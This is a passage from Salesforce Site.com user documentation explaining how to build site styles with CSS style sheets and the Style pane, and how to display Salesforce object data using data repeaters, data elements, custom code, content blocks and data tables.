• Simplifies navigation for people with accessibility issues (such as site visitors using screen readers)

For more information about using CSS and creating style sheets, go to the World Wide Web Consortium (W3C) at
www.w3.org/Style/CSS. There are also many tutorials available on the Internet that provide in-depth CSS training.

About CSS Classes and IDs

When you use style sheets to style your site, you can redefine the formatting of HTML tags such as body or h1. You can also
create CSS classes and IDs to define the style of particular elements, such as headers or repeating content. A CSS class lets
you define and apply style properties to many elements on a page, whereas a CSS ID is ideal for targeting a single item on a
page. For example, in a page's structure, IDs are often used to define the header and footer areas, as each page has only one
header or footer, but classes are used to define repeating page elements, such as a blog post.

Best Practices

• Include a CSS reset in your style sheet to reset all style items to a baseline value. This helps avoid cross-browser differences
due to their built-in default style settings.

• Use CSS classes and IDs instead of inline styles wherever possible. This promotes the separation of presentation and
content, and makes it easier to updates the site's styles.

• Use IDs when there is only one occurrence per page. Once you've used the ID, you can't use it again on that page. Use
classes when there are one or more occurrences per page.

• Use groups to organize your CSS logically and make it easier to maintain your style sheet.
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• If you’re using CSS3, ensure you preview and test your site in each browser that you want it to support, because some
browsers haven't yet fully implemented CSS3 features.

See Also:
Using the Style Pane
Understanding the Style Sheet View in Site.com
Creating and Using CSS Style Sheets

Using the Style Pane
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

The Style pane is a visual CSS editor that lets you modify style properties, such as the background color, font size, and border
style, as you work with pages and page elements. If you're using CSS classes or IDs to style your pages, you can modify or
create style items directly from the Style pane, rather than opening the style sheet.

To apply a style to a selected page or page item:

1. Open the Style pane.
2. To apply:

• An inline style, select Inline. Inline styles affect the selected item only and aren't included in a style sheet.
• A CSS class, select Class and start typing the name. If the class already exists in your style sheet, select it in the list

that appears. To create a new class, type the name, select it, and click Yes to add it to the style sheet.

• A CSS ID, select ID and select it in the drop-down list. To create a new ID, click , enter the ID name, and click

.

Menu page elements have several components, which you can style individually by selecting your preferences in the Style
drop-down list that appears.

3. In the Visual tab, apply style properties as appropriate. Alternatively, in the Code tab, you can type your CSS styles directly
and click Apply.
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Tip:  To view the style properties associated with a selected page or page element, open the Code tab of the Style
pane. To remove the style properties, click Clear.

See Also:
Creating Style Sheet Items and Groups
Creating and Using CSS Style Sheets
Cascading Style Sheets Overview

Style Pane Properties
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

The Style pane is a visual CSS editor that lets you modify style properties, such as the background color, font size, and border
style, as you work with pages and page elements.

The Background Section

DescriptionProperty

Sets the element's background color. Click the color box and use the color picker
to select a color, or enter a specific hexadecimal code in the text box. You can also
choose from a list of colors in the Background Color drop-down list.

Background Color

Adds a background image to the element. Click URL and enter the image URL,

or click  to select an imported image.

Background Image

Tiles the element's background image.Background Repeat
•

 ensures that only one copy of the image appears.
•

 repeats the image horizontally.
•

 repeats the image vertically.
•

 tiles the image both horizontally and vertically.

Specifies the position of the element's background image.Position
• To set the horizontal position of the background image, enter a value in the X

text box and select a unit of measurement. Alternatively, select Left or Right
in the drop-down list.

• To set the vertical position of the background image, enter a value in the Y text
box and select a unit of measurement. Alternatively, select Top or Bottom in
the drop-down list.
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DescriptionProperty

Sets the cursor type, such as crosshair or pointer.Cursor

The Font & Color Section

DescriptionProperty

Sets the font family of the selected element.Font

Sets the font color. Click the color box and use the color picker to select a color,
or enter a specific hexadecimal code in the text box. You can also choose from a
list of colors in the Color drop-down list.

Color

Sets the font size. Enter a value in the Size text box and select a unit of
measurement such as em, point, or %. Alternatively, select a predefined value such

Size

as XX-Small. Select Inherit to use the same font size as the parent element (for
example, the page or panel).

Tip:  Use relative sizes such as em or a percentage to enable your end users
to resize the font size in their Web browsers.

Formats the element's font style.Style
•

 makes the font bold.
•

 makes the font bold and italic.
•

 makes the font italic.
• None removes existing styles.

Specifies whether to render the font as small capitals.Font Variant

Modifies the amount of space between lines of text. Enter a value in the text box
and select a unit of measurement such as pixels, percentage, or em. Select Inherit
to use the same line height as the parent page element.

Line Height

Applies decorative effects to the element's text. For example, you could remove the
underline that usually appears under hyperlinks, which is a standard CSS rule that's
built in to most Web browsers.

Text Decoration

•
 underlines the text.

•
 applies strikethrough formatting.

•
 displays a line over the text.

• None removes existing text decoration.

Aligns the text of the selected element.Align
•

 aligns the text to the left.
•

 aligns the text to the right.
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DescriptionProperty

•
 centers the text.

•
 aligns the text with both the left and right margins.

Changes the capitalization of the element's text.Case
•

 capitalizes the first character of each word.
•

 capitalizes all characters.
•

 lowercases all characters.
• None removes existing capitalization formatting.

Indents the first line of text of the selected page element. Enter a value in the text
box and select a unit of measurement. Select Inherit to use the same indentation
as the parent page element.

Text Indent

Controls how white spaces such as spaces, tabs, and hard returns are handled inside
an element.

White Space

The Layout Section

DescriptionProperty

Positions page elements outside the normal flow of the document. Usually, elements
on a page are rendered in Web browsers in the order they appear in the document.

Positioning

Block elements such as p tags and div tags appear one beneath the other, whereas
inline elements such as em, strong, and span tags are rendered next to text or
each other.
• Absolute positions the content using the settings in the Top, Bottom, Left,

and Right text boxes.
• Relative renders the page element in the normal layout flow, but moves the

element relative to its normal position depending on the values in the Top,
Bottom, Left, and Right text boxes. For example, if you set an element's left
position to 20 pixels, the page element will be positioned 20 pixels further to
the left.

Overrides a page element's default layout behavior. For example, you can hide page
elements, make block elements render inline, or make inline elements render as
blocks.

Display

• None hides the page element.
• Block displays the page element as a block-level page element, with a line break

before and after the element.
• Inline, which is the default setting, displays the page element as an inline page

element without a line break before or after the element.
• Inline-block renders the page element as an inline rectangle, but with content

that behaves as if it's inside a block element.
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DescriptionProperty

When used in conjunction with the Absolute or Relative positioning options, these
four properties place page elements outside the normal flow of the document. Enter

Position

a value in the text boxes as appropriate and select a unit of measurement in the
respective drop-down lists.
• Top sets how far the top edge of an element is above or below the top edge of

the parent element.
• Bottom determines how far the bottom edge of an element is above or below

the bottom edge of the parent element.
• Right sets how far the top edge of an element is to the right or left of the right

edge of the parent element.
• Left defines how far the left edge of an element is to the right or left of the left

edge of the parent element.

Specifies the order in which elements overlap each other when they need to be
rendered in the same space. An element with a greater z-index value covers an
element with a lower value. The default value is 0.

Click  and  to increase and decrease the z-index, or enter a value in the text
box.

Z-index

Floats a page element to the left or right so that subsequent elements—text for
example—wrap around the floating page element.

Float

•
 floats the page element to the left.

•
 floats the page element to the right.

• None removes an existing float setting.

Specifies whether the selected page element allows floating page elements beside
it.

Clear

•
 moves the page element below any floating page element on its left.

•
 moves the page element below any floating page element on its right.

•
 moves the page element below floating page elements on either side.

• None removes existing float settings.

Specifies whether the selected page element is visible.Visibility
• Visible is the default value.
• Hidden hides the page element and renders an invisible rectangle in its place.
• Collapse is used to hide table elements. (For other page elements, it has the

same result as hidden.)

Note:  Invisible page elements still occupy the same space in the page's
layout.
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DescriptionProperty

Specifies whether the content of a page element should be clipped when it overflows
its area.

Overflow

• Visible does not clip the content.
• Hidden clips the content.
• Scroll clips the content, but provides scroll bars so that users can view the

remaining content.
• Auto is dependent on the browser, but should display a scroll bar to view the

rest of the content.

The Dimensions Section

DescriptionProperty

Sets the width of the selected page element. Enter a value in the Width text box
and select a unit of measurement. Select Inherit to use the width of the parent page
element.

Width

Sets the height of the selected page element. Enter a value in the Height text box
and select a unit of measurement. Select Inherit to use the height of the parent
page element.

Height

Sets the width of the page element's margin, which is the space between its border
and outer edge. Set the margins for all four sides by entering a value in the All
text box, or add margins to the top, right, bottom, or left sides as required.

Margins

Sets the width of the page element's padding, which is the space between its content
and border. Set the padding for all four sides by entering a value in the All text
box, or add padding to the top, right, bottom, or left sides as required.

Padding

The Borders Section

DescriptionProperty

Specifies whether to set border properties for each side separately or for all four
sides.

Type

Sets the border's style such as dashed, dotted, or double.Style

Sets the border's color. Click the color box and use the color picker to select a color,
or enter a specific hexadecimal code in the text box. You can also choose from a
list of colors in the Color drop-down list.

Color

Specifies the border's thickness. Enter a value in the Thickness text box and
select a unit of measurement. Alternatively, select Thin, Medium, or Thick.

Thickness
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The Tables Section

DescriptionProperty

When designing tables:Border Collapse
• Collapse uses a common border between cells
• Separate gives each cell its own border

Sets the horizontal distance that separates cell borders. Enter a value in the text
box and select a unit of measurement. This value is used only if Border Collapse
is set to Separate.

Horizontal Spacing

Sets the vertical spacing that separates cell borders. Enter a value in the text box
and select a unit of measurement. This value is only used if Border Collapse is set
to Separate.

Vertical Spacing

See Also:
Using the Style Pane

Understanding the Style Sheet View in Site.com
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When working with style sheets, you can add style items, organize them into groups, and edit the CSS code directly. Open a
style sheet on the Overview tab by double-clicking it or hovering over it and clicking  > Edit. The style sheet opens as a
new tab.
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• Using the toolbar (1), you can import a style sheet and edit the style sheet’s CSS code directly.

• Using the style sheet pane (2), you can:

◊ Create style items and groups

◊ Preview, edit, and delete style items

◊ Move style items and groups by dragging them to the correct location

◊ Add a CSS reset

• Using the Style Preview section (3), you can preview and manually edit a selected style item.

Note:  You can’t preview at-rules, such as @media or @font-face, in the Style Preview section.

• Using the visual CSS editor (4), you can define the CSS properties for the selected style item.

See Also:
Creating and Using CSS Style Sheets
Cascading Style Sheets Overview
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Creating and Using CSS Style Sheets
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

A default style sheet called “Site Style Sheet” is included with every site you create. However, if you're familiar with CSS and
need multiple style sheets, you can create new ones to use in your site.

To create a style sheet:

1. Click Style Sheets > New on the Overview tab. Alternatively, click New Style Sheet in the Style Sheets view.
2. Enter a name for the style sheet.
3. Click Apply. The style sheet opens.
4. Add style items and groups to the style sheet.

Note:

• Style sheet names can only contain alphanumeric characters, hyphens, colons, and underscores.

• You can also import a CSS file to use in your site.

After you create a new style sheet, you must attach it to a page to apply its styles to the page.

To attach a style sheet to a page:

1. Select the page in the Page Structure pane.

2. In the Style Sheets section of the Properties pane, click .
3. Select the style sheet in the list that appears.

4. Attach the style sheet to the page by clicking  beside the drop-down list.
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Tip:  If you used a page template to create your site pages, the quickest way to include the new style sheet on every
pages is to attach it to the template. This automatically includes a reference to the style sheet in every page that's
based on the template.

See Also:
Understanding the Style Sheet View in Site.com
Cascading Style Sheets Overview

Creating Style Sheet Items and Groups
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When adding style items to style sheets, you can define CSS classes and IDs, or you can redefine the formatting of HTML
tags such as body or h1. When you change the CSS style of an HTML tag, anything formatted with that tag is immediately
updated.

Creating Style Items

To open a style sheet, double-click it in the Style Sheets view of the Overview tab, or hover over it and click  > Edit.

If you're very familiar with CSS and prefer coding by hand, click Edit Style Sheet Code to edit the style sheet directly using
the CSS editor. Additionally, to add at-rules (for example, @media), you must edit the style sheet directly.

Alternatively:

1. Select the style sheet and click  > Insert Style Item.
2. Enter the name of the style item:

• To redefine the default formatting of a specific HTML tag, enter the HTML tag name—for example, body or h1.
• To create a CSS class, enter the class name and ensure that you include a period before it—for example, .classname.
• To create a CSS ID, enter the ID name preceded by #—for example, #contentID.

3. Click Apply.
4. Add style definitions by either:

• Setting style properties in the visual style editor on the right
• Typing CSS styles in the text box in the Style Preview section and clicking Save
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As you modify the definition of a selected style item, you can see how your changes appear in the Style Preview section.

Tip:

• A class name must begin with a period or it will not be recognized as a CSS class.
• An ID name must begin with # or it will not be recognized as a CSS ID.
• Use IDs when there is only one occurrence per page. Once you've used the ID, you can't use it again on that page.

Use classes when there are one or more occurrences per page.
• Class and ID names can contain alphanumeric characters, hyphens, and underscores only, and can't begin with a

number or include spaces.

Creating Style Groups

Use groups to organize your CSS logically. This makes it easier to locate and maintain styles.

When the style sheet is open:

1. Select the style sheet and click  > Insert Style Group.
2. Enter a name for the group and click Apply.
3. To add a new style to the group, select the group and click  > Insert Style Item. To add an existing style to the group,

drag it onto the folder icon.

Assigning Style Items

After you've created styles, you can assign them to the pages and pages elements of your site.

To assign a class to a page or page element, select it and either:

• Type the class name in the Class field of the Properties pane.
• Select Class in the Style pane, start typing the name, and select it in the list that appears.

To assign an ID to a page or page element, either:

• Type the ID name in the ID field in the Properties pane.
• Select ID in the Style pane and select it in the drop-down list.

See Also:
Creating and Using CSS Style Sheets
Understanding the Style Sheet View in Site.com
Cascading Style Sheets Overview
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Using CSS Reset
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Every browser has set presentation defaults, but unfortunately they aren't standardized across all browser types. This means
that when you use CSS to style your site, it may not render as expected when you view it in different browsers. For example,
browsers differ in how they display:

• Unordered and ordered lists

• Top and bottom margins for headings

• Indentation distances

• Default line-heights

A CSS reset cancels the differences between browsers to control how browser elements are presented to the end user. You can
either use Site.com's CSS reset, or you can add your own CSS reset code.

To use Site.com's CSS reset:

1. In the Style Sheets view on the Overview tab, open the style sheet by double-clicking it, or hovering over it and clicking
 > Edit.

2. Click  > Insert CSS Reset.
3. Ensure the CSS reset is positioned at the top of the style sheet. To move it, drag it to the correct location in the pane on

the left.

To add your own CSS reset code:

1. In the Style Sheets view on the Overview tab, open the style sheet by double-clicking it, or hovering over it and clicking
 > Edit.

2. Click Edit Style Sheet Code to open the CSS editor.
3. Paste the code at the top of the style sheet code.
4. Click Save and Close.

See Also:
Creating and Using CSS Style Sheets
Cascading Style Sheets Overview
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WORKING WITH DYNAMIC DATA

Site.com Data Services Overview
Site.com data services combine many features that let you connect to standard and custom Salesforce objects. Retrieve data
from your organization’s objects and dynamically display it on your site pages, or alternatively, gather and submit data from
your customers. And when you update data in your Salesforce object, the changes are reflected automatically on the live site—no
site updates required!

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Here are a few ways you can use Site.com data services:

• Publish a catalog of products—List your company's products and include information, such as model numbers and prices,
pulled dynamically from your organization.

• Post company press releases—Publish your company’s press releases and sort by publication date.

• Create a realtor website—Display current listings filtered by city or price.

• Create a recruiting website—Post job openings to a public site and allow visitors to submit applications and resumes.

So how does it all work? Several data-bound page elements let you retrieve and display your data, or collect data from your
site visitors.

Data tables connect to Salesforce objects, retrieve a data set based on the filter criteria that you specify, and display one or
more record as rows in the table.

Data Repeaters and data elements combine to let you connect to standard and custom objects, retrieve data, and dynamically
display it on your site’s pages. Together, the data repeater and data elements result in a "repeating template" that offers you
the greatest flexibility for displaying one or more records on the page.

Data functions let you perform calculations on data retrieved from objects and display the result on the page. For example,
for a particular field in an object, you can use a data function to calculate the total value or the average amount of all returned
records.

Nested repeaters let you retrieve data from objects with a parent-to-child relationship.

Forms and form fields combine to let you collect data from your site visitors and submit the data to standard or custom
Salesforce objects. Create web-to-lead forms, capture customer details, or gather feedback on your products or services.

Data Services Considerations

• To allow guest users to view the data in or submit data to a Salesforce object, you must set the object’s data access permissions.
• When working with assets, the easiest way to take advantage of Site.com data services is to import the files into your

website, and store a relative URL to these assets in your standard or custom object. See Storing Assets to Use with Salesforce
Objects on page 3367.
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• If you add a data-bound page element to your site and then subsequently change a field type in the Salesforce object it’s
connected to—for example, changing a text field to a picklist—the data-bound page element will no longer work. You
must reconfigure the data-bound page element to reference the updated field.

• If you update data in an object that’s connected to a data table, data repeater, or data function, the changes are reflected
automatically on the live site. To control this, you can add a picklist field to the object to specify when a record is approved
to go live. Then you can use the field to filter the records by approved status, so only approved records appear on the live
site.

See Also:
Accessing Data in Related Objects Overview
Adding Pagination to Data Repeaters and Data Tables
The Default, Error, and No Data Views

Setting Data Access Permissions for Salesforce Objects
Sites built with Site.com are publicly available, so visitors access the site via the Guest User license that’s associated with the
site.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

AND

“Manage Users”

AND

“Customize Application”

To edit the guest user profile:

By default, site visitors can access information made available in an active public site, such as the site’s pages and assets.
However, to allow guest users to view or submit data to a Salesforce object, you must modify the object’s permission in the
site’s guest user profile. Each site has a separate Guest User license, so you can control guest access to Salesforce objects on a
per-site basis.
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To edit the site’s guest user profile:

1. On the Overview tab of Site.com Studio, click Site Configuration and click Site Name Profile. Alternatively, if you’re
adding a data repeater, data table, data function, or form to the page, click go to the guest user profile in the item’s dialog
box.

2. In the site’s guest user profile, enable the “Read” permission on the standard or custom objects you want to retrieve data
from using data repeaters, data tables, or data functions. Enable the “Create” permission on the objects you want to submit
data to using forms. All permissions that aren't set by default must be set manually.

3. If required, modify the field-level security of an object.

See Also:
Storing Assets to Use with Salesforce Objects
Site.com Data Services Overview

Storing Assets to Use with Salesforce Objects
Because websites built with Site.com are publicly available, site visitors don’t have the security privileges required to view
images and documents stored in your Salesforce objects, which are available to authenticated users only.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Therefore, the easiest way to take advantage of Site.com data services is to import the files into Site.com, and instead store a
relative URL to these assets in your standard or custom object. Alternatively, if your images or files are hosted elsewhere and
readily available on the Internet, you can use an absolute URL.

For example, let’s say you want to use a custom object called “Catalog” to build a Catalog site page that displays product details
and images. Before you begin building the Catalog site page, you would:

1. Import the product images into your Site.com site.
2. In the Catalog object, create a field to store the relative URL of the image, such as Image URL.
3. For each product record, add the relative path of the image. This URL is relative to the site, so if you upload widget.png

to your site, the relative path is /widget.png. URLs are case sensitive.
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Then, when you add a data table, or a data repeater and data elements to the Catalog site page to display the product data,
you can reference the Image URL field to dynamically display each product’s image on the page.

See Also:
Setting Data Access Permissions for Salesforce Objects
Site.com Data Services Overview

DYNAMICALLY RETRIEVING AND DISPLAYING DATA

Dynamically Retrieving Data with Data Repeaters
Use a data repeater to connect to a standard or custom Salesforce object and retrieve a data set based on the filter criteria that
you specify. When you combine a data repeater with data elements, custom code, or content blocks, you can create a “repeating
template” that displays one or more records on the page.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

AND

“Manage Users”

AND

“Customize Application”

To edit the guest user profile:

To add a data repeater to a page:

1. Drag a Data Repeater from the Page Elements pane onto the page.
2. Select the object that you want to connect to.
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Note:

• For Site.com users, the drop-down list only displays objects that are available to guest users because site visitors
access your public site via the Guest User license. To make other objects available, go to the guest user profile,
enable the relevant object's “Read” permission, and refresh the list.

• For Communities users, the drop-down list displays objects that may not be available to site visitors. For
authenticated visitors, object access on public and private pages is controlled by their user profiles. For
unauthenticated visitors, object access on public pages is controlled by the site’s guest user profile.

3. Optionally, in Filters, select criteria to filter your data set. If you don’t select any criteria, all the data from the item is
returned.

a. Select the field to which the filter criteria apply. The Field drop-down list displays the object’s fields, followed by the
fields of all parent objects, which use the format parent_object_name.field_name.

b. Select the operator to control how results are filtered. For example, select Equals to return an exact match.
c. Select the source of the filter value. For example, to specify an explicit value, select Fixed value, or to use the values

passed to the page via a query string, select URL query string.
d. Set the value of the filter. If you’re using a query string, you can also specify what should happen if the query string is

missing.
e. Add additional filter criteria as required to narrow your results further. Each filter item is combined with an AND

operator.

Note:  If you’re using a fixed value to filter the results, you can view the returned records in the Connection Preview
section. To refresh the list of records, click Reload Preview.

4. In Sorting, you can specify whether to sort the results by one or more fields in ascending or descending order. For example,
if you’re working with an object that contains user data, you could sort your results by gender first and then by name.

5. In Limits, you can limit the number of returned results. For example, if you’re only interested in the top five results, enter
5 in the Limit results to field.

6. If you’re adding pagination, specify the number of results to display per page in the Results per page field.
7. Click Save.

Next, you must add either data elements, custom code, or content blocks to the data repeater to display the data it retrieves.

See Also:
The Default, Error, and No Data Views
Improving Performance Using Caching
Data Filtering Examples
Site.com Data Services Overview
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Displaying Data Using Data Elements
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

A data element, which must be contained in a data repeater, binds to a field in the object that the data repeater is connected
to. Each data element acts as a placeholder that is replaced with the field’s data when the page loads. Combined, the data
repeater and data elements result in a “repeating template” that displays one or more records on the page.

You can use data elements to display plain text, formatted text (for dates and numbers), or images. You can also add hyperlinks
to data elements to allow site visitors to navigate to another page, such as a detailed description, or to refresh the data displayed
in the data repeater based on their selection. See Data Filtering Examples on page 3389.

1. Drag a Data Element from the Page Elements pane onto the data repeater. You can’t add data elements to anything but
a data repeater.

2. Select the field to display. To customize how the field’s data is displayed, click Customize.

Note:  The object’s fields are listed first, followed by the fields of all parent objects, which use the format
parent_object_name.field_name.

3. Select the display type.

DescriptionOption

Lets you display the field’s data as plain text.Text

Lets you choose from several text display formats if you’re
working with dates, times, or currency.

Formatted text

Lets you display the field’s data as an image if the field
contains an image URL. The URL can be absolute or relative
to the site.

You can also select a field to use for the alternative text or
enter custom text.

Image

4. To create a hyperlink, select Add a hyperlink. Otherwise, go to step 8.
5. Select the link type.
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DescriptionOption

Lets you link to a Web page by:A URL
• Choosing a field that you want to reference, such as a

field that stores the relative URLs of PDFs you uploaded
to your site.

• Choosing a field that you want to reference and clicking
Customize to add an absolute URL or to create a custom
link, such as a URL query string.

Lets you link to a page, image, or file in the site by selecting
the item type and then selecting the item. (If you can’t see

An item in your site

the list of items, place your cursor in the URL field and press
the DOWN key on your keyboard.)

You can also customize the URL—for example, by creating
a URL query string.

Lets you link to an email message by entering the recipient's
address, and the message subject and body.

You can use merge fields to access the object’s fields. For
example, if an object has an Email field, enter the merge
field, such as {!email}, in the Email address text box.

An email

When the link is clicked, it opens a new message window
in the user’s email client and adds the appropriate email
address to the To: field.

6. Optionally, enter a tooltip by selecting the required field or clicking Customize to add custom text.

The tooltip displays as a pop-up when the user hovers over the link.

7. If you’re linking to a URL or an item in your site, specify where the item should open.

DescriptionOption

Loads the item into a popup window. When you select this
option, you can set the title for the popup and control its
appearance and size with the options that appear.

Popup window

Loads the item into a new, unnamed browser window.New window (_blank)

Loads the item into the same frame or window as the link.
This is the default setting.

Same window (_self)

Loads the item into the topmost parent frameset or window
of the frame that contains the link.

Topmost window (_top)

Loads the item into the parent frameset or window of the
frame that contains the link.

Parent window (_parent)
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8. Click Save.

The data element is displayed on the page as a merge field. To test the output, preview the page.

See Also:
Dynamically Retrieving Data with Data Repeaters
Displaying Data Using Custom Code
Displaying Data Using Content Blocks

Displaying Data Using Custom Code
In addition to data elements, you can also use custom code as an alternative way to display data in a data repeater. It’s particularly
useful for displaying field data that’s inline with text.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

To add custom code to a data repeater:

1. Drag a Custom Code page element from the Page Elements pane onto the data repeater.
2. To access the fields of the object the data repeater is connected to, type {! and double-click the expression that you want

to display.

Note:  The object’s fields are listed first, followed by the fields of all parent objects, which use the format
parent_object_name.field_name.

3. Add any additional expressions or text you require. For example:

To contact {!Name}, call {!Phone}.

where {!Name} and {!Phone} are placeholders for the values of the Name and Phone fields of each record.
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4. Click Save and Close.

See Also:
Dynamically Retrieving Data with Data Repeaters
Displaying Data Using Content Blocks
Data Filtering Examples

Displaying Data Using Content Blocks
In addition to data elements and custom code, you can also use content blocks as an alternative way to display data in a data
repeater. It’s particularly useful for displaying field data that’s inline with text.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

To add a content block to a data repeater:

1. Drag a Content Block page element from the Page Elements pane onto the data repeater.
2. Enter the name of the field you want to display using an expression. For example, {!Name}.

Note:  The object’s fields are listed first, followed by the fields of all parent objects, which use the format
parent_object_name.field_name.

3. Add any additional expressions or text you require. For example:

To contact {!Name}, call {!Phone}.

where {!Name} and {!Phone} are placeholders for the values of the Name and Phone fields of each record.

You can also use expressions if you’re adding a hyperlink to the content block.
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4. Click Save.

See Also:
Dynamically Retrieving Data with Data Repeaters
Displaying Data Using Custom Code
Displaying Data Using Data Elements
Data Filtering Examples

Dynamically Retrieving Data with Data Tables
Use a data table to connect to a standard or custom Salesforce object, retrieve a data set based on the filter criteria that you
specify, and display one or more record as rows in the table. A data table’s columns bind to the fields of the object it’s connected
to. Each column cell acts as a placeholder that is replaced with the field’s data when the page loads.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

AND

“Manage Users”

AND

“Customize Application”

To edit the guest user profile:

To add a data table to the page:

1. Drag a Data Table from the Page Elements pane onto the page.
2. Select the object that you want to connect to.
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Note:

• For Site.com users, the drop-down list only displays objects that are available to guest users because site visitors
access your public site via the Guest User license. To make other objects available, go to the guest user profile,
enable the relevant object's “Read” permission, and refresh the list.

• For Communities users, the drop-down list displays objects that may not be available to site visitors. For
authenticated visitors, object access on public and private pages is controlled by their user profiles. For
unauthenticated visitors, object access on public pages is controlled by the site’s guest user profile.

3. Optionally, in Filters, select criteria to filter your data set. If you don’t select any criteria, all the data from the item is
returned.

a. Select the field to which the filter criteria apply. The Field drop-down list displays the object’s fields, followed by the
fields of all parent objects, which use the format parent_object_name.field_name.

b. Select the operator to control how results are filtered. For example, select Equals to return an exact match.
c. Select the source of the filter value. For example, to specify an explicit value, select Fixed value, or to use the values

passed to the page via a query string, select URL query string.
d. Set the value of the filter. If you’re using a query string, you can also specify what should happen if the query string is

missing.
e. Add additional filter criteria as required to narrow your results further. Each filter item is combined with an AND

operator.

Note:  If you’re using a fixed value to filter the results, you can view the returned records in the Connection Preview
section. To refresh the list of records, click Reload Preview.

4. In Sorting, you can specify whether to sort the results by one or more fields in ascending or descending order. For example,
if you’re working with an object that contains user data, you could sort your results by gender first and then by name.

5. In Limits, you can limit the number of returned results. For example, if you’re only interested in the top five results, enter
5 in the Limit results to field.

6. If you’re adding pagination, specify the number of results to display per page in the Results per page field.
7. Click Next.

8. Add available fields to the table by double-clicking a field, or selecting it and clicking .
9. Reorder the list of selected fields by clicking Move Up or Move Down.
10. Click Save.

Note:  You can’t add page elements to a data table. However, you can add additional columns to a data table by
selecting it and clicking Edit. On the Select Fields screen, select the additional fields and save your changes.

After you’ve added the data table to the page, you can use the Properties pane to:

• Provide a short heading or summary of the table’s purpose in the Caption field. The caption appears above the table, and
complies with W3C accessibility standards for screen reader users.

• Hide the column headings by deselecting Show Column Headings in the Table section.
• Make the columns sortable by selecting the jQuery Flexigrid theme in the Theme section and selecting Enable Sorting.

The theme also changes the appearance of the table.
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• Change the name of a column by selecting the column cell and updating its name in the Column Heading property in
the Data Table section.

See Also:
Editing Columns in a Data Table
The Default, Error, and No Data Views
Improving Performance Using Caching
Data Filtering Examples

Editing Columns in a Data Table
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

A data table’s columns bind to the fields of the object it’s connected to. Each column cell acts as a placeholder that is replaced
with the field’s data when the page loads.

You can display plain text, formatted text (for dates and numbers), or images in the column cells. You can also add hyperlinks
to column cells to allow site visitors to navigate to another page, such as a detailed description, or to refresh the data displayed
in the data table based on their selection. See Data Filtering Examples on page 3389.

To edit a column:

1. Double-click the column cell in the data table.
2. Select the field to display. To customize how the field’s data is displayed, click Customize.

Note:  The object’s fields are listed first, followed by the fields of all parent objects, which use the format
parent_object_name.field_name.

3. Select the display type.

DescriptionOption

Lets you display the field’s data as plain text.Text

Lets you choose from several text display formats if you’re
working with dates, times, or currency.

Formatted text
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DescriptionOption

Lets you display the field’s data as an image if the field
contains an image URL. The URL can be absolute or relative
to the site.

You can also select a field to use for the alternative text or
enter custom text.

Image

4. To create a hyperlink, select Add a hyperlink. Otherwise, go to step 8.
5. Select the link type.

DescriptionOption

Lets you link to a Web page by:A URL
• Choosing a field that you want to reference, such as a

field that stores the relative URLs of PDFs you uploaded
to your site.

• Choosing a field that you want to reference and clicking
Customize to add an absolute URL or to create a custom
link, such as a URL query string.

Lets you link to a page, image, or file in the site by selecting
the item type and then selecting the item. (If you can’t see

An item in your site

the list of items, place your cursor in the URL field and press
the DOWN key on your keyboard.)

You can also customize the URL—for example, by creating
a URL query string.

Lets you link to an email message by entering the recipient's
address, and the message subject and body.

You can use merge fields to access the object’s fields. For
example, if an object has an Email field, enter the merge
field, such as {!email}, in the Email address text box.

An email

When the link is clicked, it opens a new message window
in the user’s email client and adds the appropriate email
address to the To: field.

6. Optionally, enter a tooltip by selecting the required field or clicking Customize to add custom text.

The tooltip displays as a pop-up when the user hovers over the link.

